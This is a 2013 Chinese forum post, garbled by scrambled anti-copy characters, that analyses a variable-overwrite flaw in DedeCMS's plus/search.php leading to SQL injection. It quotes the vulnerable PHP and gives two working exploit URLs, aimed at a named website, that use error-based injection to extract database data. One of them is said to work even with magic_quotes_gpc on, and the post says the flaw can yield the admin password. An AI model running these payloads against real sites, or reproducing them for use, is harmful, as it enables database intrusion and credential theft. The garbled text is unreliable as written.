微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋." i4 Y" f" P2 @6 v, Z4 V* L# j
作者: c4rp3nt3r@0x50sec.org
5 G. R" ^3 ^, j4 o# ADedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
# X D8 I$ h& r5 W% m
! U( M# ^( d2 h黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
4 @ E+ j" K9 N( s& C% U
/ f8 B2 c! t$ m& K# Z: ]============0 B3 |6 t3 x6 z* P3 D: F L
. @; ?6 F0 w8 N9 a - w& E" n5 j4 J+ C& ~7 j, t8 I+ z
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.. N X3 F) b$ m% p2 k2 Q
' w2 E, [, S6 n7 S1 @ O* i8 S
require_once(dirname(__FILE__).”/../include/common.inc.php”);) A" A- Y9 {" _/ R; l
require_once(DEDEINC.”/arc.searchview.class.php”);5 ~* u3 b+ X# y) `
' [# {+ E3 H% B- e$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
; l: d/ h: f0 P8 C$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;! b( @) N4 P; h' g3 E2 f
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
) d3 _# C) f# n8 A1 e% ]$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
3 p5 Y8 V: V( Q- d6 I+ G$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;. `& m5 v3 c* y8 V+ T9 w
n! @* G S3 {; Lif(!isset($orderby)) $orderby=”;
) [, Z( i- b2 P: I% U1 s* ?else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);6 E0 h0 d, ]/ H1 x; `
6 U5 i! v! E+ A4 l
* c; U5 z( C% A. n: Zif(!isset($searchtype)) $searchtype = ‘titlekeyword’;4 ?* ]+ l0 S$ p2 c# S7 c
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
- X) Z! u& [, j 3 r9 ]3 a4 O3 T M
if(!isset($keyword)){
+ M5 b) W: z+ H; r, i if(!isset($q)) $q = ”;
% j$ b% z/ q: {) k9 K $keyword=$q;
3 ~( b3 d3 J7 y- `! d}9 L+ F7 u" @& L+ H3 |
* Y* I" y+ H3 ]% K
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
7 z8 X2 h$ l2 z8 V 0 t! M& v: r( B- Z) J/ V u
//查找栏目信息6 E5 W" S" r( {5 j
if(empty($typeid))% Z' ^! `5 X$ l+ k; L2 D
{
0 \: r0 E: V9 O/ Q- I+ A $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
; _" u( h) b/ }" `% k z4 P if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
$ t: [1 n+ I. I" p+ [: h5 v7 @ {
, l- ]- y) j6 q3 s6 s $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);2 L" s9 o; P# k, h5 V. l7 G
fwrite($fp, “<”.”?php\r\n”);
+ {0 r% q% E; V7 J, f4 j $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
% `! c3 A2 O0 O2 m $dsql->Execute();
) `5 p* _5 L. k while($row = $dsql->GetArray())
4 S$ c, Q. D! d* h {0 t" n3 Z# F8 x' B9 x* w
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);: Z" G R% ~' q4 j; I
}5 s1 u- x' a+ t7 G! u
fwrite($fp, ‘?’.'>’);
, d, s: Y9 ]- R- W O* Y fclose($fp);
( g0 U& v- N' ~3 O+ h }2 Q# @6 ^& I2 |" Q+ Q
//引入栏目缓存并看关键字是否有相关栏目内容
, M0 x: p: ?5 `) z6 R% E$ v require_once($typenameCacheFile);" K% |8 F5 y* K; e( D; d& v0 ~
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
; o% L* x5 h7 m' \; C1 i//
6 A }1 f* l2 u0 _7 H7 k: j if(isset($typeArr) && is_array($typeArr))
' v8 u$ D* o( A8 j {
' C: I8 d, {" }! s6 Y4 k# i. f foreach($typeArr as $id=>$typename)
, ]1 a' k. Z* T6 x" S* j2 h {" f. }% M& c) m! ?. Z( b
' z) j* x1 V G0 i R) |
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
4 W, t* j0 d% D0 q if($keyword != $keywordn)# o+ x- q4 p4 @4 L2 ~
{
& q, v' I2 N/ B% e $keyword = $keywordn;- q. Z" z4 w! O$ G* y
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
6 E u9 S% \, ?7 X L! _9 Y* ] break;8 T- {1 Z5 @% @% A
}
9 F6 |. ?7 `! ]# L( b8 i4 Y4 F }
$ B& a, V+ v! v. i- f7 K& L8 v }
# j* I. w3 o( j5 `}; u( ~0 k; N6 q# q5 f
然后plus/search.php文件下面定义了一个 Search类的对象 .; ^6 _8 s+ J5 Y" [0 I
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.' c1 \! M; G) [8 i' A4 y8 E
$this->TypeLink = new TypeLink($typeid);
: g9 x; r( c" i
S$ }8 X6 f; Q Q5 [" |TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
& ^5 C. s; F7 i# q+ Y8 o+ t 6 ]$ D' K1 L$ `
class TypeLink
7 A P. R1 p8 `* W0 n{) {! E0 Y) T2 j: T
var $typeDir;
5 E7 p9 H. Z6 e* o var $dsql;
$ `8 g9 y( `; `7 d" U3 u% B5 s- ~ var $TypeID;
2 U1 {+ k: o. l! X' i' y' r& f var $baseDir;6 X/ p: a$ R3 \& R8 @
var $modDir;
8 ]& V: V c9 x% @0 M var $indexUrl;. F/ T5 l6 c% |+ H* [4 C$ `# x
var $indexName;
; ^5 j: W5 H+ C9 z0 Z! i var $TypeInfos;
8 a3 b1 W3 K( u9 Q var $SplitSymbol;
- O! \# P$ J8 C( n; G [ var $valuePosition;5 f( R1 k. \9 l- L) x
var $valuePositionName;
3 h- G2 j/ \' ^: ?) L var $OptionArrayList;//构造函数///////! _: l' }7 `# `4 R: R
//php5构造函数
; ?) b. h7 L7 q! U t function __construct($typeid)% B# a A0 S- I
{4 |- O* o! ]" @( u2 D
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl']; `( @" {3 N: z4 h; t. }3 R
$this->indexName = $GLOBALS['cfg_indexname'];
2 ]; K# V6 H D* r* R! ^, j: o $this->baseDir = $GLOBALS['cfg_basedir'];
* c7 W6 L& U5 i. s $this->modDir = $GLOBALS['cfg_templets_dir'];
! O- ~' K# B3 ~: O $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];3 \; i1 t: B/ ^, G8 l
$this->dsql = $GLOBALS['dsql'];2 a3 p7 F; t' S0 z
$this->TypeID = $typeid;2 ?; ?4 ^) H% \1 I3 }9 k9 }' y
$this->valuePosition = ”;
# o0 D5 c# f0 c9 H6 w, z, a8 y# Z $this->valuePositionName = ”;
' q) z( `8 {! M9 P* G7 f4 T $this->typeDir = ”;
' g0 {8 w* D- `* V $this->OptionArrayList = ”;6 k) a% P& Y% [7 R8 T8 f5 N# \8 Y
. n# U" a0 A, t0 r* [) }' R
//载入类目信息
% e7 e t- D5 }" V5 h3 E. f 0 a- N9 Y3 _0 L0 H# y2 o
<font color=”Red”>$query = “SELECT tp.*,ch.typename as2 E# T8 z* R% Z8 m0 P
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join* x p/ X! K$ @3 V
`#@__channeltype` ch3 t. ]% n6 P$ l5 y2 b' |: {
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿- W/ B( J; L Q+ D" G! A
5 [: o5 D; C2 X' j4 M' B7 ]+ z: z8 f$ z if($typeid > 0)
1 e" ]" ~3 U' k8 Q( ~6 E; o* ^ {0 h, q- Y! u3 n* A6 k. o$ C
$this->TypeInfos = $this->dsql->GetOne($query);) i0 U- }: B2 \+ f
利用代码一 需要 即使magic_quotes_gpc = Off
) J1 l |" r. V % { Z0 a# X$ W8 A0 I+ l
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title) |- y2 j6 L9 A6 C- j0 m
: B! J6 C6 z: d4 u2 i8 t这只是其中一个利用代码… Search 类的构造函数再往下
3 H7 O' s% q& X3 R: ^/ l 7 I; E( _- h! ?
……省略
* U2 d1 D8 A6 D) @9 l1 D( b$this->TypeID = $typeid;8 v' n: n( m6 E5 z# o$ w- j
……省略8 `, c& }4 h2 c1 [6 ]
if($this->TypeID==”0″){
6 B) A I- Q$ o3 v# y $this->ChannelTypeid=1;6 X: g8 P5 R5 C8 I; L% `
}else{; J* m2 Y& _* W2 f- O
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
! ]) A) B; Y/ k. j* X- T/ _. ^//现在不鸡肋了吧亲… V- l j5 Z) o8 f* Y( J/ \! p; b2 I
$this->ChannelTypeid=$row['channeltype'];7 B5 T! r3 K! M% g, ]% A7 ?
9 t, n! o1 P" ^6 t
}
1 D+ @$ y( h. X1 b2 K( L7 B利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
# n0 i% [0 U) n U, D6 I ; j5 t) q7 c* R- \
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
( j& w2 N" g7 A+ u: Q" l- L - u; }# F3 A0 {4 }
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站" K) Q* l9 j: E4 {3 s
|
发表于 2013-1-19 08:18:56
收藏
支持
反对